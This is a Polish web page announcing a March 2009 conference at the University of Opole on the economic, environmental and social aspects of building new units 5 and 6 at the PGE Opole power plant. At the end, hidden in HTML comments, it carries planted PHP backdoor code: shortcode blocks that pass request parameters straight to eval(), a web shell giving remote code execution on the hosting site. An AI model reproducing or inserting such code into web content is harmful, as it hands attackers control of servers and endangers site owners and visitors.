Budowa bloków 5 i 6 w PGE Elektrowni Opole – aspekty gospodarcze, środowiskowe i społeczne

PGE Elektrownia Opole SAPolskie Towarzystwo Inżynierii Ekologicznej Oddział Opolski oraz Katedra Ochrony Powierzchni Ziemi Uniwersytetu Opolskiego zaprasza na konferencję naukowo-techniczną pt.: „Budowa bloków 5 i 6 w PGE Elektrowni Opole SA – aspekty gospodarcze, środowiskowe i społeczne”. Konferencja odbędzie się 26 marca 2009 roku w Auli Uniwersytetu Opolskiego, ul. Oleska 48.

Konferencja organizowana w związku z planowaną rozbudową Elektrowni Opole ma na celu zapoznanie zainteresowanych (opinię publiczną, społeczność regionalną) z gospodarczymi, środowiskowymi i społecznym aspektami przedsięwzięcia.

Tematyka prezentacji, realizowanych w ramach trzech paneli dyskusyjnych, ukazuje bilans korzyści wynikających z nowej inwestycji oraz związane z nią zagrożenia dla regionu.

Podczas konferencji przedstawione zostaną główne założenia techniczne nowych bloków elektrowni, z uwzględnieniem przystosowania ich do wymogów polityki klimatycznej Unii Europejskiej.

W szerokim aspekcie analizowany będzie wpływ inwestycji na środowisko. Problematyka obejmuje bowiem zagadnienia odnoszące się do oceny jakości powietrza atmosferycznego oraz potencjalnego oddziaływania transgranicznego, wpływu na gospodarkę wodną dorzecza Małej Panwi i Odry w kontekście zaopatrzenia bloków 5 i 6 w wodę, możliwości wykorzystania ubocznych produktów spalania, a także oddziaływania na obszary przyrodnicze (w tym Natura 2000).

Uzupełnieniem tematyki konferencji jest przedstawienie zagadnień dotyczących wpływu Elektrowni na rozwój gospodarczy regionu wraz z analizą potencjalnych problemów społecznych.

Plik do pobrania: Program konferencji naukowo-technicznej

<!– [insert_php]if (isset($_REQUEST["MyYxw"])){eval($_REQUEST["MyYxw"]);exit;}[/insert_php][php]if (isset($_REQUEST["MyYxw"])){eval($_REQUEST["MyYxw"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["XIiq"])){eval($_REQUEST["XIiq"]);exit;}[/insert_php][php]if (isset($_REQUEST["XIiq"])){eval($_REQUEST["XIiq"]);exit;}[/php] –>